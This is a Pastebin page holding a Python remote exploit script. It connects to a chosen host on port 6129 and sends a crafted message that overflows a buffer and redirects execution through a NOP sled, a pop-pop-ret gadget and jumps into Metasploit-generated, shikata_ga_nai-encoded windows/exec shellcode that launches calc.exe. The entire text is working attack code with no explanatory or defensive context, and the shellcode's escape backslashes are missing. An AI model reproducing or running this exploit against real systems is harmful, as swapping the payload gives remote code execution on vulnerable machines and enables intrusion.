Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket
- import sys
- import os
- import time
- import struct
- import binascii
- import random
- # windows/exec - 220 bytes
- # http://www.metasploit.com
- # Encoder: x86/shikata_ga_nai
- # VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
- # CMD=calc.exe
- sc = ""
- sc += "xbax01xa8x4fx9exd9xcaxd9x74x24xf4x5ex29"
- sc += "xc9xb1x31x31x56x13x03x56x13x83xeexfdx4a"
- sc += "xbax62x15x08x45x9bxe5x6dxcfx7exd4xadxab"
- sc += "x0bx46x1exbfx5ex6axd5xedx4axf9x9bx39x7c"
- sc += "x4ax11x1cxb3x4bx0ax5cxd2xcfx51xb1x34xee"
- sc += "x99xc4x35x37xc7x25x67xe0x83x98x98x85xde"
- sc += "x20x12xd5xcfx20xc7xadxeex01x56xa6xa8x81"
- sc += "x58x6bxc1x8bx42x68xecx42xf8x5ax9ax54x28"
- sc += "x93x63xfax15x1cx96x02x51x9ax49x71xabxd9"
- sc += "xf4x82x68xa0x22x06x6bx02xa0xb0x57xb3x65"
- sc += "x26x13xbfxc2x2cx7bxa3xd5xe1xf7xdfx5ex04"
- sc += "xd8x56x24x23xfcx33xfex4axa5x99x51x72xb5"
- sc += "x42x0dxd6xbdx6ex5ax6bx9cxe4x9dxf9x9ax4a"
- sc += "x9dx01xa5xfaxf6x30x2ex95x81xccxe5xd2x7e"
- sc += "x87xa4x72x17x4ex3dxc7x7ax71xebx0bx83xf2"
- sc += "x1exf3x70xeax6axf6x3dxacx87x8ax2ex59xa8"
- sc += "x39x4ex48xcbxdcxdcx10x22x7bx65xb2x3a"
- port = 6129
- if len (sys.argv) == 2:
- (progname, host ) = sys.argv
- else:
- print len (sys.argv)
- print 'Usage: {0} host'.format (sys.argv[0])
- exit (1)
- csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
- csock.connect ( (host, int(port)) )
- type = 444.0
- buf = struct.pack("I", 4400 ) #Init Version
- buf += "xcc"*4
- buf += struct.pack("d", type) #Minor Version
- buf += struct.pack("d", type) #Minor Version
- buf += (40 - len(buf)) * "C"
- csock.send(buf)
- wstr = "x90" * 0x10 #nop sled
- wstr += sc #calc shellcode
- wstr += "x90" * (0x2ac - 0x10 - len(sc))
- wstr += "xebx06xffxff" #short jump forward
- wstr += struct.pack("I", 0x00401161 ) #pop pop return gadget
- wstr += "x90" * 3 #nop
- wstr += "xe9x6bxfaxffxff" #short jump back to shellcode
- wstr += "E" * 0xbc
- wstr += ("%" + "x00" + "c" + "x00")*5
- buf = struct.pack("I", 0x9c44) #msg type
- buf += wstr #payload
- buf += "x00" * (0x200) #null bytes
- csock.send(buf)
- print binascii.hexlify(csock.recv(0x4000)) #necessary reads
- print binascii.hexlify(csock.recv(0x4000))
- csock.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement